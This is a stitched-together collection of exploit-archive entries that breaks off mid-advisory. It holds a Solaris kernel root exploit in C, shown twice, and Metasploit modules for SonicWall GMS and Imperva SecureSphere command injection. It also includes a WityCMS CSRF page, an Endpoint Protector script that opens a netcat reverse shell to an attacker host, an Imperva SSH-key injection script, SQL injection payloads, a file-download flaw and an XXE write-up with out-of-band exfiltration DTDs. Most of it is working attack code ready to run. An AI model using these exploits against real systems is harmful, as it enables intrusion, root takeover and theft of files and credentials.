if ((data = elf_getdata (scn, data)) == 0 || data->d_size == 0)
continue;
Elf32_Sym *esym = (Elf32_Sym *) data->d_buf;
Elf32_Sym *lastsym = (Elf32_Sym *) ((char *) data->d_buf + data->d_size);
for (; esym < lastsym; esym++)
{
if (esym->st_value == 0 ||
(ELF32_ST_TYPE(esym->st_info) == STT_FUNC))
continue;
if (strcmp (name, elf_strptr (elf, shdr->sh_link, (size_t) esym->st_name)) == 0)
{
r = (void *) esym->st_value;
goto done;
}
}
}
}
}
done:
elf_end (elf);
close (fd);
return (r);
}
int
main (int argc, char **argv)
{
void *devarrayp, *sysentp, *ptr, *target;
_sdbc_ioctl32_t sdcp_ioctl;
_sysent_t sysent;
int devindx, fd, id, n, sysindx;
printf ("Sun Opensolaris <= snv_104 local kernel root exploit\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
fd = open ("/dev/sdbc", O_RDONLY);
if (fd < 0)
{
fprintf (stderr, "%s: failed opening /dev/sdbc\n", argv[0]);
return (EXIT_FAILURE);
}
memset (&sysent, 0, sizeof (sysent));
sysent.sy_narg = 0;
sysent.sy_flags = 0;
sysent.sy_call = pown_kernel;
sysent.sy_lock = NULL;
sysent.sy_callc = NULL;
devarrayp = resolve_kernsymbl ("devarray");
if (devarrayp == NULL)
{
fprintf (stderr, "%s: failed resolving &devarray\n", argv[0]);
return (EXIT_FAILURE);
}
sysentp = resolve_kernsymbl ("sysent");
if (sysentp == NULL)
{
fprintf (stderr, "%s: failed resolving &sysent\n", argv[0]);
return (EXIT_FAILURE);
}
sysentp += 8; /* any ideas? */
target = sysentp + 0x2C0;
sysindx = ((int) target - (int) sysentp) / sizeof (sysent);
devindx = ((char *) target - (char *) devarrayp) / 256;
ptr = mmap (NULL, PAGESIZE, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
if ((int) ptr == -1)
{
fprintf (stderr, "failed mmap\n");
return (EXIT_FAILURE);
}
memset (ptr, 0, PAGESIZE);
memcpy ((ptr + PAGESIZE) - sizeof (sysent), &sysent, sizeof (sysent));
memset (&sdcp_ioctl, 0, sizeof (sdcp_ioctl));
sdcp_ioctl.arg0 = (unsigned int) (ptr + PAGESIZE) - sizeof (sysent);
sdcp_ioctl.arg1 = devindx;
sdcp_ioctl.arg2 = sizeof (sysent) * 2;
printf ("* devarray: 0x%08X, sysent: 0x%08X, target: 0x%08X\n", (int) devarrayp, (int) sysentp, (int) target);
printf ("* devarray idx: %u\n", sdcp_ioctl.arg1);
printf ("* sysent idx: %u\n", sysindx);
printf ("\n* overwriting... ");
n = ioctl (fd, SDBC_TEST_INIT, &sdcp_ioctl);
printf ("done\n");
printf ("\n* jumping... ");
syscall (sysindx);
printf ("done\n\n");
id = getuid ();
printf ("* getuid(): %d\n", id);
if (id == 0)
{
printf ("+Wh00t\n\n");
/* exec shell, for some reason execve doesn't work!?$! */
system ("/bin/bash");
}
else
fprintf (stderr, "%s: failed to obtain root :(\n", argv[0]);
return (EXIT_SUCCESS);
}
*/
/* sdbc-testinit-v2.c
*
* Copyright (c) 2008-2017 by <mu-b@digit-labs.org>
*
* Sun Solaris <= 11.3 AVS local kernel root exploit
* by mu-b - Tue 16 May 2017
*
* $Id: sdbc-testinit-v2.c 37 2018-07-23 20:08:39Z mu-b $
*
* - Tested on: Solaris 5.11 11.3 + AVS (i86pc)
* Opensolaris snv_104 + AVS (i86pc)
*
* hmmm, this has gotta be test code!?%$!
*
* This was originally found in OpenSolaris and later ported to Solaris with the
* exception that we now have to exploit a signedness bug in the devarray index
* parameter whereas previously it was unbounded! (see sdbc-testinit.c).
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008-2017!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <libelf.h>
#include <limits.h>
#include <string.h>
#include <stropts.h>
#include <sys/elf.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/syscall.h>
#include <unistd.h>
#define SDBC(a) (('B'<<16)|('C'<<8)|(a))
#define SDBC_TEST_INIT SDBC(5)
typedef struct _sdbc_ioctl {
long arg0;
long arg1;
long arg2;
long arg3;
long arg4;
long magic;
long ustatus;
long pad[1];
} _sdbc_ioctl_t;
typedef struct _sysent_s {
char sy_narg;
#ifdef _LP64
unsigned short sy_flags;
#else
unsigned char sy_flags;
#endif
int (*sy_call)();
void *sy_lock;
void *sy_callc;
} _sysent_t;
#ifdef _LP64
# define KTHREAD 0x18
#else
# define KTHREAD 0x10
#endif
#define XSTRINGY(a) STRINGY(a)
#define STRINGY(a) #a
int
pown_kernel (void)
{
#ifdef _LP64
__asm__ ( "mov %gs:" XSTRINGY(KTHREAD) ", %rax\n"
"mov 0x1c8(%rax), %rax\n"
"movl $0x0, 0x4(%rax)\n" /* kthread_t->t_cred->cr_uid */
"movl $0x0, 0x8(%rax)\n" /* kthread_t->t_cred->cr_gid */
"movl $0x0, 0xc(%rax)\n" /* kthread_t->t_cred->cr_ruid */
"movl $0x0, 0x10(%rax)"); /* kthread_t->t_cred->cr_rgid */
#else
__asm__ ( "mov %gs:" XSTRINGY(KTHREAD) ", %eax\n"
"mov 0xdc(%eax), %eax\n"
"mov 0x14(%eax), %eax\n"
"movl $0x0, 0x4(%eax)\n"
"movl $0x0, 0x8(%eax)\n"
"movl $0x0, 0xc(%eax)\n"
"movl $0x0, 0x10(%eax)");
#endif
return (0);
}
static void *
resolve_kernsymbl (char *name)
{
Elf_Scn *scn = NULL;
Elf *elf;
void *r = NULL;
int fd;
fd = open ("/dev/ksyms", O_RDONLY);
if (fd < 0)
{
fprintf (stderr, "failed opening /dev/ksyms\n");
return (NULL);
}
elf_version (EV_CURRENT);
if ((elf = elf_begin (fd, ELF_C_READ, NULL)) == NULL)
{
fprintf (stderr, "elf_begin failed\n");
goto done;
}
while ((scn = elf_nextscn (elf, scn)) != 0)
{
#ifdef _LP64
Elf64_Shdr *shdr;
if ((shdr = elf64_getshdr (scn)) != 0)
#else
Elf32_Shdr *shdr;
if ((shdr = elf32_getshdr (scn)) != 0)
#endif
{
if (shdr->sh_type == SHT_SYMTAB)
{
Elf_Data *data = NULL;
if ((data = elf_getdata (scn, data)) == 0 || data->d_size == 0)
continue;
#ifdef _LP64
Elf64_Sym *esym = (Elf64_Sym *) data->d_buf;
Elf64_Sym *lastsym = (Elf64_Sym *) ((char *) data->d_buf + data->d_size);
#else
Elf32_Sym *esym = (Elf32_Sym *) data->d_buf;
Elf32_Sym *lastsym = (Elf32_Sym *) ((char *) data->d_buf + data->d_size);
#endif
for (; esym < lastsym; esym++)
{
if (esym->st_value == 0 ||
#ifdef _LP64
(ELF64_ST_TYPE(esym->st_info) == STT_FUNC))
#else
(ELF32_ST_TYPE(esym->st_info) == STT_FUNC))
#endif
continue;
if (strcmp (name, elf_strptr (elf, shdr->sh_link, (size_t) esym->st_name)) == 0)
{
r = (void *) esym->st_value;
goto done;
}
}
}
}
}
done:
elf_end (elf);
close (fd);
return (r);
}
int
main (int argc, char **argv)
{
void *devarrayp, *sysentp, *ptr, *targetp;
int align, fd, id, n, sysindx;
_sdbc_ioctl_t sdbc_ioctl;
_sysent_t sysent;
long devindx;
printf ("Sun (Open)Solaris <= 11.3 AVS local kernel root exploit\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008-2017!@$!\n\n");
fd = open ("/dev/sdbc", O_RDONLY);
if (fd < 0)
{
fprintf (stderr, "%s: failed opening /dev/sdbc\n", argv[0]);
return (EXIT_FAILURE);
}
memset (&sysent, 0, sizeof (sysent));
sysent.sy_narg = 0;
sysent.sy_flags = 0;
sysent.sy_call = pown_kernel;
sysent.sy_lock = pown_kernel;
sysent.sy_callc = pown_kernel;
devarrayp = resolve_kernsymbl ("devarray");
if (devarrayp == NULL)
{
fprintf (stderr, "%s: failed resolving &devarray\n", argv[0]);
return (EXIT_FAILURE);
}
sysentp = resolve_kernsymbl ("sysent");
if (sysentp == NULL)
{
fprintf (stderr, "%s: failed resolving &sysent\n", argv[0]);
return (EXIT_FAILURE);
}
/* devarray elements are 256-bytes in size, so we can only write at an offset
* aligned to devarrayp & 0xff */
targetp = (void *) (((long) sysentp & ~0xFF) | ((long) devarrayp & 0xFF));
targetp += 0x1700;
sysindx = ((long) targetp - (long) sysentp) / sizeof (sysent);
devindx = ((char *) targetp - (char *) devarrayp) / 256;
devindx = (long) LONG_MIN + devindx;
ptr = mmap (NULL, PAGESIZE, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
if (ptr == (void *) -1)
{
fprintf (stderr, "failed mmap\n");
return (EXIT_FAILURE);
}
memset (ptr, 0, PAGESIZE);
align = ((long) sysentp & 0x0F) - ((long) devarrayp & 0x0F);
if (align < 0)
align = -align;
memcpy ((ptr + PAGESIZE) - sizeof (sysent) - align, &sysent, sizeof (sysent));
memset (&sdbc_ioctl, 0, sizeof (sdbc_ioctl));
sdbc_ioctl.arg0 = (long) (ptr + PAGESIZE) - sizeof (sysent);
sdbc_ioctl.arg1 = devindx;
sdbc_ioctl.arg2 = sizeof (sysent) * 2;
#ifdef _LP64
printf ("* devarray: 0x%016lX, sysent: 0x%016lX, target: 0x%016lX\n", (long) devarrayp, (long) sysentp, (long) targetp);
printf ("* devarray idx: %ld %016lX\n", devindx, devindx);
#else
printf ("* devarray: 0x%08lX, sysent: 0x%08lX, target: 0x%08lX\n", (long) devarrayp, (long) sysentp, (long) targetp);
printf ("* devarray idx: %ld %08lX\n", devindx, devindx);
#endif
printf ("* sysent idx: %u\n", sysindx);
printf ("\n* overwriting... ");
n = ioctl (fd, SDBC_TEST_INIT, &sdbc_ioctl);
if (n != -1)
{
printf ("failed, ouch (%d)\n", n);
return (EXIT_FAILURE);
}
printf ("done\n");
printf ("* jumping... ");
syscall (sysindx);
printf ("done\n");
id = getuid ();
printf ("* getuid(): %d\n", id);
if (id == 0)
{
char *args[2] = { "/bin/sh", NULL };
printf ("+Wh00t\n\n");
execve (args[0], args, NULL);
}
else
fprintf (stderr, "%s: failed to obtain root :(\n", argv[0]);
return (EXIT_SUCCESS);
}
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "SonicWall Global Management System XMLRPC
set_time_zone Unath RCE",
'Description' => %q{
This module exploits a vulnerability in SonicWall Global
Management System Virtual Appliance versions 8.1 (Build 8110.1197)
and below. This virtual appliance can be downloaded from
http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a
holistic way to manage your entire network security environment.'
These vulnerable versions (8.1 Build 8110.1197 and below) do not
prevent unauthenticated, external entities from making XML-RPC
requests to port 21009 of the virtual app. After the XML-RPC call
is made, a shell script is called like so:
'timeSetup.sh --tz="`command injection here`"' --usentp="blah"'.
},
'License' => MSF_LICENSE,
'Author' => [ 'Michael Flanders', #MSF Module
'kernelsmith' #Advisor
],
'References' => [
['URL', 'https://www.digitaldefense.com/digital-defense/vrt-discoveries/'],
['URL', 'https://slides.com/kernelsmith/bsidesaustin2018/#/']
],
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Targets' => [
[ 'SonicWall Global Management System Virtual Appliance', {} ],
],
'Payload' => {
# Can't use ampersand, Java's XML-RPC parser will complain and return an error
'BadChars' => "\x26",
'Compat' => {
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic bash telnet'
}
},
'DisclosureDate' => "Jul 22 2016",
'DefaultTarget' => 0))
register_options(
[
OptString.new('WEB_SERVER_PORT', [ false, 'Port of web console login page.
Defaults to 80/443 depending on SSL.'])
])
end
def check
if datastore['WEB_SERVER_PORT']
port_number = datastore['WEB_SERVER_PORT']
else
port_number = datastore['SSL'] ? '443' : '80'
end
handler = datastore['SSL'] ? 'https' : 'http'
res = request_url("#{handler}://#{rhost}:#{port_number}")
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
unless res.code == 200 && res.body =~ /<TITLE>.+v(\d\.\d)/
return CheckCode::Safe
end
version = Gem::Version.new $1.to_s
unless version <= Gem::Version.new('8.1')
return CheckCode::Safe
end
CheckCode::Appears
end
def exploit
unless check == CheckCode::Appears
fail_with Failure::NotVulnerable, "The target is not vulnerable."
end
print_status "The target appears to be vulnerable, continuing exploit..."
send_xml
end
def send_xml
xml_body = <<~HERESTRING
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>set_time_config</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>timezone</name>
<value>
<string>"`#{payload.encoded}`"</string>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
HERESTRING
res = send_request_raw({
'method' => 'POST',
'uri' => '/',
'data' => xml_body,
'ctype' => 'text/xml; charset=UTF-8'
})
unless res && res.body.include?("success")
print_error("Error sending XML to #{rhost}:#{rport}")
end
end
end
<!--
# Exploit Title: WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change)
# Vendor Homepage: https://creatiwity.net/witycms
# Software Link: https://github.com/Creatiwity/wityCMS/releases/tag/0.6.2
# Exploit Author: Porhai Eung
# Website: http://www.chhaipov.com
# CVE: CVE-2018-14029
# Category: webapps
1. Description
CSRF vulnerability in admin/user/edit in Creatiwity wityCMS 0.6.2 allows an attacker to take over a user account by modifying user's data such as email and password
2. Exploit and Proof of Concept
To exploit this vulnerability, victim need to be logged in at target site namely victim.com and visit crafted site made by attacker namely attacker.com. Then an authenticated POST request will be generated from victim browser and it will be submit to victim.com to modify user's data to attacker desired value.
- POC hosted at attacker.com
-->
</div>
<iframe id="test" name="test" style="display:none">
</iframe>
<form action="http://victim.com/wity/admin/user/edit/1" method="post" id="the_form" style="display:none" target="test">
<input type="hidden" name="id" value="1" />
<input type="hidden" name="nickname" value="admin" />
<input type="hidden" name="password" value="csrf123" />
<input type="hidden" name="password_conf" value="csrf123" />
<input type="hidden" name="email" value="csrf@test.com" />
<input type="hidden" name="groupe" value="0" />
<input type="hidden" name="type" value="all" />
<input type="submit" value="Change Password" />
</form>
<script type="text/javascript">
//<![CDATA[
var $form = document.getElementById ('the_form');
$form.submit ();
//]]>
</script>
</div>
<!--
3. Solution
- Original password is needed in order to change new password of user
- Implement CSRF token
-->
# Title : CoSoSys Endpoint Protector - Authenticated Remote Root Command Injection
# Date : Vulnerability submitted in 01/12/2017 and published in 01/08/2018
# Author : 0x09AL
# Tested on : Endpoint Protector 4.5.0.1
# Software Link : https://www.endpointprotector.com/
# Vulnerable Versions : Endpoint Protector <= 4.5.0.1
# Endpoint Protector suffers from an authenticated command injection vulnerability. By default the username and password are : root:epp2011
# In the Appliance Tab , Server Maintenance the NTP Server field is vulnerable to command injection. There is a call to sh -c {NTP Server field} which is not validated. Attached is the exploit which does this automatically.
# The command may take a while to execute.
import requests
exp = requests.session()
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
username = 'root'
password = 'epp2011'
host = 'x.x.x.x.x'
rev_host = 'x.x.x.x'
rev_port = '443'
r = exp.post('https://%s/index.php/login' % host,data={'username':username,'password':password,'login':'Login'},verify=False)
shell = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f' % (rev_host,rev_port)
payload = '&& %s' % shell
print payload
if(r.text.find("Welcome Guest")>0):
print "[-] Incorrect credentials [-]"
else:
print "[+] Logged in successfully [+]"
r = exp.get('https://%s/index.php/appliance/maintenance' % host,headers={'X-Requested-With': 'XMLHttpRequest'},verify=False)
if(r.text.find("csrf")>-1):
print "[+] Getting CSRF Token [+]"
csrf_token = r.text.split('value="')[1].split('">')[0]
print "[+] Token: %s [+]" % csrf_token
post_data = {
'csrf_token' : csrf_token,
'continent' :'Europe',
'region' :'Berlin',
'timeSetting[ntpserver]' : payload,
'timeSetting[timesync]' :'12'
}
r = exp.post('https://%s/index.php/appliance/timezone' % host,data=post_data,headers={'X-Requested-With': 'XMLHttpRequest','Referer': 'https://%s/index.php/' % host},verify=False)
print "[+] Sending exploit [+]"
if(r.text.find("nc")>-1):
post_data = {
'ntpserver': payload,
'continent' :'Europe',
'region' :'Berlin'
}
r = exp.post('https://%s/index.php/appliance/timezone' % host,data=post_data,headers={'X-Requested-With': 'XMLHttpRequest','Referer': 'https://%s/index.php/' % host},verify=False)
print "[+] Exploit success [+]"
# Title: Imperva SecureSphere <= v13 - Privilege Escalation
# Author: 0x09AL
# Date: 01/08/2018
# Tested on: Imperva SecureSphere 11.5,12.0,13.0
# Vendor: https://www.imperva.com/
# Vulnerability Description
# There is a program named PCE.py which runs as root and starts a unix domain socket listener in /tmp/PCEListener.
# The problem is that the permissions in this socket are misconfigured. Every user on the system can interact with it.
# Using this exploit you can add arbritary ssh keys to authorized_keys for the admin user and login as the admin.
# Steps to reproduce:
# 1. Be a low-privileged user like oracle,apache. (You can simulate it by using `su oracle`)
# 2. Create a keypair. ssh-keygen -t rsa -b 4096
# 3. Modify the ssh_key variable.
# 4. Run python exploit.py
# 5. Login as the admin user using ssh -i id_rsa admin@ip-address.
#
import socket
import sys
import time
# Create a UDS socket
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
server_address = '/tmp/PCEListener'
data = ''
# The ssh rsa-key to be added to the admin user.
ssh_key = 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDVM24qDoENqa1oRHJZEgZS7M/eRXHEnr0/OhdgUPWUblJJAj+f5fF7VkgvnJNSz/25OElNck4Z1qqpENBtHhe27H9100z2RceebKzNMOxHD2Sdut00uNMgL97AAuzhq6471XmcutHsndT12Bd85yxQPJiGaLIyEqgVigMaAz5Jya1pw4pB7r3m4hRbeFOaS74Edzr2pk8ND1EG/CG4qTP+dt0VhyjyEimZtt+2h4VT2spRNGzLO32vjPk4hSSSeu1dqPjg6dCNwgz6JS3clAaugeT8gnWjMnrt63PIUiXcioqEbJz+IHN20MHl2GXNuzAAvSw7U7ko4BhumfgchyFmkmfS6HdtP25kiQ6A4RexcAkfbfSYsapepHlvai1+FN+M67TpIpUlIR0xNrvJEgF6/51vAGCnOjZz4BDN740JHfGxAThyny5r4FTo5c9ZNYF8jAb6TqSX4HRS/AFo8l7AynPntCnXQCYSHcH/2XG/osrDNnuh0pUlTqCK10O2GoskBsxIBYTmWEoj/6hsbQyDGuicVa/e/xweo7MA2pNAPwxYDZt/h4G/wMrCSAk6FoEL6YXMRK/RwW6p2FDYRLeCoDa/RQ8R7dEquTLTqPgQF8rPsSuhILp/CKv03JkNRq94pDyCFGHHyz+TifZ0m1yIt13N7f8BXqw7OYFJ8cFGww== pwn@wpad'
print >>sys.stderr, 'Connecting to %s' % server_address
try:
sock.connect(server_address)
except socket.error, msg:
print >>sys.stderr, msg
sys.exit(1)
try:
# Send data
message = '<commandSet Id="0" mode="Sync" sender="localhost"><commands><command num="0"><argv>platform ssh authorized create</argv><impctlParams/><params><param>--user=admin</param><param>--key=%s</param></params></command></commands></commandSet>' % ssh_key
message_size = "0" * (10 - len(str(len(message)))) + str(len(message))
print >>sys.stderr, 'Sending message size "%s"' % message_size
sock.sendall("%s" % message_size)
print >> sys.stderr, 'Sending exploit'
sock.sendall(message)
amount_received = 0
amount_expected = int(sock.recv(10))
while amount_received < amount_expected:
data += sock.recv(10)
amount_received = len(data)
time.sleep(0.5)
# print >>sys.stderr, 'received "%s"' % data
print >>sys.stderr, 'Response : \n %s' % data
finally:
print >>sys.stderr, 'closing socket'
sock.close()
# Exploit Title: FB Inboxer 1.2 - 'search_field' SQL Injection
# Google Dork: N/A
# Date: 02.08.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/pageresponse-a-fb-inboxer-addon-facebook-auto-commentprivate-reply-likeshare-for-full-page/21486371
# Version: 1.2
# Tested on: Kali linux
====================================================
Description : The vulnerability allows an attacker to inject sql commands
from the search section with 'search_field' parameter in the management
panel.
# Demo : http://server/home/login
# PoC : SQLi :
http://server/admin/user_management/ajax_list_info
POST /admin/user_management/ajax_list_info HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/admin/user_management
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 91
Cookie: ci_session=8v3965595vs5h1gcufa8kmkl8uti8ccr;
crud_page_c2dc7c9e0776f8cb12c51196de4108be=2;
per_page_c2dc7c9e0776f8cb12c51196de4108be=15;
hidden_ordering_c2dc7c9e0776f8cb12c51196de4108be=asc;
hidden_sorting_c2dc7c9e0776f8cb12c51196de4108be=id;
search_text_c2dc7c9e0776f8cb12c51196de4108be=tes;
search_field_c2dc7c9e0776f8cb12c51196de4108be=name
Connection: keep-alive
search_text=tes&search_field=name&per_page=15&order_by%5B0%5D=id&order_by%5B1%5D=asc&page=1
Parameter: search_field (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: search_text=tes&search_field=name AND (SELECT 4580 FROM(SELECT
COUNT(*),CONCAT(0x71716a7671,(SELECT
(ELT(4580=4580,1))),0x7170717671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY
x)a)&per_page=15&order_by[0]=id&order_by[1]=asc&page=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: search_text=tes&search_field=name AND
SLEEP(5)&per_page=15&order_by[0]=id&order_by[1]=asc&page=1
====================================================
# Exploit Title: TI Online Examination System v2 - Arbitrary File Download
# Dork: N/A
# Date: 02.08.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/ti-online-examination-system-v2/11248904
# Version: 2.0
# Category: Webapps
# Tested on: Kali linux
# Description : The "Export" operation in the admin panel is vulnerable.
The attacker can download and read all files known by the name via
"download.php"
====================================================
# Demo : server/admin/
# Vuln file : /admin/download.php
115. $data_action = $_REQUEST['action'];
116. if($data_action == 'downloadfile')
117. {
118. $file = $_REQUEST['file'];
119. $name = $file;
120. $result = output_file($file, $name);
# PoC :
http://server/admin/download.php?action=downloadfile&file=[filename]
you can write the known file name instead of [filename]. For Example:
'download.php' or 'index.php'
====================================================
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SSH
def initialize(info={})
super(update_info(info,
'Name' => "SecureSphere v12.0.0.50 - SealMode Shell Escape (root)",
'Description' => %q{
This module exploits a vulnerability in SecureSphere cli to escape
the sealed-mode of Imperva and execute code as the root user. This
module requires credentials of a user to login to the SSH or can be
exploited by a less privileged user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'0x09AL', # Vulnerability Discovery and Metasploit Module
],
'References' =>
[
['URL', 'N/A']
],
'DefaultOptions' =>
{
'Payload' => 'python/meterpreter/reverse_tcp',
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [ ['Automatic', {}] ],
'Privileged' => false,
'DisclosureDate' => "01/08/2018",
'DefaultTarget' => 0
))
register_options(
[
Opt::RHOST(),
Opt::RPORT(22),
OptString.new('USERNAME', [ true, 'The username for authentication', 'root' ]),
OptString.new('Password', [ true, 'The password for authentication', '123456' ]),
]
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def exploit
factory = ssh_socket_factory
ssh_options = {
:auth_methods => ['password', 'keyboard-interactive'],
:port => rport,
:use_agent => false,
:config => false,
:password => password,
:proxy => factory,
:non_interactive => true
}
ssh_options.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
print_status("#{rhost}:#{rport} - Attempting to login...")
begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh = Net::SSH.start(rhost, username, ssh_options)
end
rescue Rex::ConnectionError
return
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return
end
if ssh
print_good("SSH connection established successfully.")
ssh.open_channel do |channel|
channel.exec "impctl platform import --password \" & uname -a & sh\"" do |ch, success|
if success
channel.on_data do |ch, data|
if data.inspect.match(/Linux/)
print_good "Host is vulnerable"
channel.send_data "python -c \"#{payload.encoded}\"\n"
channel.close
else
print_bad "Host is not vulnerable"
channel.close
end
end
end
end
end
begin
ssh.loop unless session_created?
rescue Errno::EBADF => e
elog(e.message)
end
end
end
end
Issue: Out-of-Band XXE in Universal Media Server's SSDP Processing
Reserved CVE: CVE-2018-13416
# Vulnerability Overview
The XML parsing engine for Universal Media Server's SSDP/UPNP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Unauthenticated attackers on the same LAN can use this vulnerability to:
- Access arbitrary files from the filesystem with the same permission as the user account running UMS.
- Initiate SMB connections to capture NetNTLM challenge/response and crack to clear-text password.
- Initiate SMB connections to relay NetNTLM challenge/response and achieve Remote Command Execution in Windows domains.
Exploitation can be demonstrated using evil-ssdp (https://gitlab.com/initstring/evil-ssdp).
# Discovered By
Chris Moberly @ The Missing Link Security
# Vendor Status
UMS team responded to notification within an hour, patch in progress.
# Vulnerability Details
Atack type: Remote, unauthenticated
Impact: Information disclosure up to code execution
Affected component: UMS's SSDP discovery / XML parsing
Operating Systems affected: Verified Windows 10 (likely all versions)
UMS version affected: Tested on 7.1.0 (current as of July 2018). Older versions likely also vulnerable.
Attack vector: XXE
# Technical Overview
UMS, like many other media servers, will attempt to discover other devices on a local network. The discovery process is handled by Simple Service Discovery Protocol (SSDP), which sends a UDP multicast out to 239.255.255.250 on port 1900. This is the first step in finding and adding Universal Plug and Play (UPNP) devices.
We can reply to that UDP multicast directly on the same port that the request initiated from, informing this client that we have a shared device. When we do this, we provide the location of an XML file containing more information about our device. This is called a Device Descriptor.
UMS will automatically access the Device Descriptor over HTTP, parsing the XML content. This is expected behaviour for SSDP/UPNP.
By hosting a specially crafted XML file at that location, we can force UMS to do several things. The POC used to prove this vulnerability (POC 1 below) contained the following XML content:
```
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file://///$smbServer/smb/hash.jpg" >
<!ENTITY xxe-url SYSTEM "http://$localIp:$localPort/ssdp/xxe.html" >
]>
<hello>&xxe;&xxe-url;</hello>
<root>
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<device>
```
When UMS parses this, it does two things:
1. Accesses the SMB share running at the $smbServer variable. This allows us to collect or relay the NetNTLM challenge/response.
2. Accesses an HTTP server at the $localIp variable. This is used for verification purposes while testing the vulnerability.
The unexpected behaviour here is the ability to provide the `ENTITY` tags, forcing UMS to automatically access file paths and HTTP URLs.
# POC 1: Capcturing NetNTLM Challenge/Response
This is a common attack method inside a Windows domain, where compromising an account can assist with moving laterally through the network.
This vulnerability can be easily validated using the [evil-ssdp tool found here](https://gitlab.com/initstring/evil-ssdp).
The process is:
1. Execute the evil-ssdp tool as follows from a Linux host:
```
essdp.py eth0 -t xxe-smb # instructs tool to use the 'xxe' template for zero-day hunting
```
2. From the same Linux host, either launch a simple netcat listener like this:
```
sudo nc -nlvp 445
```
or use Impacket to listen and extract the NetNTLM challenge/response as follows:
```
sudo python examples/smbserver.py smb /tmp/smb/
```
3. From a Windows host on the same network, simply restart UMS. evil-ssdp will display messages like the following:
```
[XML REQUEST] Host: 10.0.200.10, User-Agent: UMS/7.1.0 Windows10/10.0 UPnP/1.0 Cling/2.0
GET /ssdp/device-desc.xml
```
When that happens, either the netcat listener or the Impacket SMB server will receive the connection. If using Impacket, you will now have the NetNTLM challenge/response of the user running UMS. This can be cracked to clear-text using tools like Hashcat. Alternatively, you can use Impacket to relay that hash to another machine on the network, achieving remote code execution.
# POC 2: Accessing Arbitrary Files
If an attacker knows specifically what files they are looking for, this same vulnerability can be used to extract that information. Essentially, an XML entity will be defined as a variable, storing the output of a file on the machine where UMS is installed. Then, an HTTP request will be sent to the attacker's machine that includes that variable. The attacker will be able to see this file in their HTTP server logs.
We need two files hosted on the attacking server to do this. The initial Device Descriptor sent is:
```
<!DOCTYPE data[
<!ENTITY % file SYSTEM "file:///C:/users/public/pwned.txt">
<!ENTITY % dtd SYSTEM "http://$localIp:$localPort/ssdp/data.dtd">
%dtd;
]>
<data>&send;</data>
```
Which triggers another connection request to the following data.dtd file:
```
<!ENTITY % all "<!ENTITY send SYSTEM 'http://$localIp:$localPort/?exfiltrated=%file;'>">
%all;
```
We can also verify this using the evil-ssdp tool, using the 'xxe-exfil' template. For this POC, only extraction of 1-line files was found to be possible.
To reproduce:
